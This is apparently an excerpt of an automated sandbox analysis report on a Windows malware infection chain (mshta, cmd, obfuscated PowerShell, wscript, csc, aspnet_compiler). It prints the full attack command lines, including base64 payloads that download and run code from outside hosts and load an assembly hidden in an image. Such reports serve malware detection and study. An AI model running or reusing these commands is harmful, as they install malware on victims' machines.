                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"Jump to behavior
                      Suspicious powershell command line found
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0041607F pushad ; iretd 12_2_00416091
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00414986 push ds; iretd 12_2_004149AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0041298E pushfd ; iretd 12_2_0041299A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00414B2D push edi; iretd 12_2_00414B3C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00414B33 push edi; iretd 12_2_00414B3C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00403380 push eax; ret 12_2_00403382
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00408442 push 00000074h; iretd 12_2_00408478
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00416C91 push FAC063A2h; retf 12_2_00416CB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004176FD push ebp; ret 12_2_004176FE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00404E85 push esi; ret 12_2_00404EAF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017809AD push ecx; mov dword ptr [esp], ecx12_2_017809B6
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E409AD push ecx; mov dword ptr [esp], ecx16_2_04E409B6
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EBE2A0 push ecx; ret 16_2_02EBE330
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EB62BE push ebx; ret 16_2_02EB62F5
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EBC3DF push FFFFFFD0h; retf 16_2_02EBC432
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EB437A push ebp; ret 16_2_02EB437B
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EA50BF push 00000074h; iretd 16_2_02EA50F5
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EAF60B pushfd ; iretd 16_2_02EAF617
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EA1B02 push esi; ret 16_2_02EA1B2C
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EB390E push FAC063A2h; retf 16_2_02EB3935
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D144C4 push es; retf 16_2_04D144C5
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D1464C push esp; retf 16_2_04D14662
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D1C0CA push ds; retf 16_2_04D1C0CC
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D11D6F push esi; iretd 16_2_04D11D70
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D15FC8 push edi; iretd 16_2_04D15FC7
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D15FB6 push edi; iretd 16_2_04D15FC7
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D1AFBB push ss; ret 16_2_04D1AFBC
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D1BF1B pushad ; retf 16_2_04D1BF1E
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D15F1E push ds; iretd 16_2_04D15F46
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D14844 push ebx; iretd 16_2_04D14846
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
